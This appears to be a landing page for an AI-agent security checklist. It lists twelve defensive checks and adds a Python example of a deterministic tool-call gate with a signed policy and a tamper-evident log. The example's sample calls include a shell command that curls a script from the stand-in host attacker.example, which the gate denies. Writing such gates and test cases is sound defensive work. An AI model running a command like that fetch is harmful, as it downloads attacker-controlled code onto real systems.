Free resource

The Agent Security Checklist.

The same checklist we run on client code, distilled from 250+ real vulnerabilities we found across AI-agent systems, MCP servers and developer tools. Vendor-neutral, no product required.

The checklist ships in July 2026. Add your email and we'll send it the day it's ready, plus the occasional new finding. No spam, unsubscribe anytime.

What's inside

Twelve checks, grouped into four moves.

No theory. Each item is a concrete check you can run against an agent environment this week, with the failure mode it prevents.

01

Inventory every agent environment

List where agents run and what each can reach: repos, tools, credentials, networks.

02

Map the credential blast radius

For each environment, write down the worst action its tokens allow.

03

Separate read from write

Default agents to read-only; make every write an explicit, named grant.

04

Gate privileged tool calls

Put a deterministic allow-list, not a model's judgment, between untrusted input and the shell, the network and secrets.

05

Pin and verify the supply chain

Lock package sources and verify provenance before an agent installs anything.

06

Treat prompts as untrusted input

Don't rely on filtering content; enforce what the agent is allowed to do regardless of what it has read.

07

Log the action, not just the chat

Record the tool calls and effects, in a tamper-evident trail you can review later.

08

Make policy verifiable

Sign what's allowed so a reviewer can prove which rules were in force.

09

Compare expected vs. reported

Diff the policy you assigned against what each environment actually applied.

10

Route exceptions, not everything

Keep aligned environments quiet; send only drift, gaps and mismatches to review.

11

Rehearse the kill switch

Know exactly how to revoke an agent's access fast, and test that it works.

12

Re-audit on every capability change

New tool, new token, new model: re-run the checklist before it ships.
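To make checks 03, 04, 07, 08 and 09 concrete, here is a small tool-call gate added as an example; it is not code from the checklist or from the firm behind it. The policy format, tool names, the `authorize` / `ActionLog` / `policy_drift` helpers and the sample calls are all this example's own assumptions, and the HMAC tag stands in for the asymmetric signature a real policy owner would use.

```python
"""Added example, not from the checklist page: checks 03, 04, 07, 08 and 09
in one small gate. Names, policy format and sample calls are assumptions."""
import hashlib
import hmac
import json

# Stand-in key so the example runs offline. A shared HMAC secret proves the
# policy was not altered but not who signed it; production would use Ed25519.
POLICY_SIGNING_KEY = b"demo-policy-key-do-not-use"
GENESIS = "0" * 64

def canonical(obj) -> bytes:
    """Deterministic JSON so hashes and tags do not depend on key order."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()

def sign_policy(policy: dict) -> dict:
    """Check 08: tag the policy so a reviewer can prove which rules were in force."""
    tag = hmac.new(POLICY_SIGNING_KEY, canonical(policy), hashlib.sha256).hexdigest()
    return {"policy": policy, "sig": tag}

def verify_policy(signed: dict) -> dict:
    tag = hmac.new(POLICY_SIGNING_KEY, canonical(signed["policy"]), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, signed["sig"]):
        raise ValueError("policy signature mismatch: refusing to enforce")
    return signed["policy"]

# Check 03: read-only by default, writes are explicit named grants.
# Check 04: shell and network go through allow-lists, not model judgment.
ASSIGNED_POLICY = {
    "read_tools": ["read_file", "search_code"],
    "write_grants": {"write_file": ["docs/"]},   # path prefixes this tool may write
    "shell_allow": ["git", "pytest"],            # permitted argv[0] values
    "network_allow": ["api.github.com"],         # permitted hosts
}

def authorize(policy: dict, call: dict) -> tuple:
    """Check 04: a deterministic decision. Nothing the agent read is an input here."""
    tool, args = call["tool"], call.get("args", {})
    if tool in policy["read_tools"]:
        return True, "read tool"
    if tool in policy["write_grants"]:
        path = args.get("path", "")
        ok = any(path.startswith(p) for p in policy["write_grants"][tool])
        return ok, f"write grant check for {path!r}"
    if tool == "shell":
        argv = args.get("argv", [])
        ok = bool(argv) and argv[0] in policy["shell_allow"]
        return ok, f"shell allow-list check for argv[0]={argv[:1]!r}"
    if tool == "http":
        host = args.get("host", "")
        return host in policy["network_allow"], f"network allow-list check for {host!r}"
    return False, f"unknown tool {tool!r}"

class ActionLog:
    """Check 07: hash-chained record of tool calls and decisions, not the chat."""
    def __init__(self):
        self.entries, self.head = [], GENESIS

    def append(self, call: dict, allowed: bool, reason: str) -> str:
        entry = {"call": call, "allowed": allowed, "reason": reason, "prev": self.head}
        self.head = hashlib.sha256(canonical(entry)).hexdigest()
        self.entries.append({**entry, "hash": self.head})
        return self.head

def verify_chain(entries: list) -> bool:
    """Recompute every link; an edited, reordered or dropped entry breaks the chain."""
    prev = GENESIS
    for e in entries:
        body = {k: v for k, v in e.items() if k != "hash"}
        if body["prev"] != prev or hashlib.sha256(canonical(body)).hexdigest() != e["hash"]:
            return False
        prev = e["hash"]
    return True

def policy_drift(assigned: dict, applied: dict) -> dict:
    """Checks 09 and 10: report only the keys where an environment differs."""
    return {k: {"expected": assigned.get(k), "reported": applied.get(k)}
            for k in sorted(set(assigned) | set(applied)) if assigned.get(k) != applied.get(k)}

def run_session(signed_policy: dict, calls: list) -> ActionLog:
    policy = verify_policy(signed_policy)   # never enforce an unverified policy
    log = ActionLog()
    for call in calls:
        log.append(call, *authorize(policy, call))
    return log

# Constructed sample calls, including two an injected prompt might ask for.
SAMPLE_CALLS = [
    {"tool": "read_file", "args": {"path": "src/main.py"}},
    {"tool": "write_file", "args": {"path": "docs/README.md"}},
    {"tool": "write_file", "args": {"path": ".github/workflows/ci.yml"}},
    {"tool": "shell", "args": {"argv": ["curl", "http://attacker.example/x.sh"]}},
    {"tool": "http", "args": {"host": "api.github.com"}},
]

if __name__ == "__main__":
    log = run_session(sign_policy(ASSIGNED_POLICY), SAMPLE_CALLS)
    print([e["allowed"] for e in log.entries], "chain intact:", verify_chain(log.entries))
    print(policy_drift(ASSIGNED_POLICY, {**ASSIGNED_POLICY, "shell_allow": ["git", "pytest", "bash"]}))
```

Two design points worth noting. The gate sees only the structured tool call, never the prompt or the documents the agent read, which is what makes check 06 enforceable rather than a filtering problem. And the chain head returned by `append` is only tamper-evident if it is copied somewhere the agent's credentials cannot write; a log the agent can rewrite from the first entry is a chat transcript with extra steps.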

Who it's for

Written for the people who own the risk.

Security

AppSec & security engineering

A concrete starting point for governing agent work without becoming the bottleneck on every action.

Platform

Platform & infrastructure

Roll the controls out once and let environments converge, with no inbound access required.

Engineering

Eng leads shipping agents

Move fast and keep agents productive while only genuine divergence stops for review.

Get the checklist

Send it to my inbox.

Free, vendor-neutral, and drawn from real findings. It ships in July 2026 - add your email and we'll send it the day it's ready.
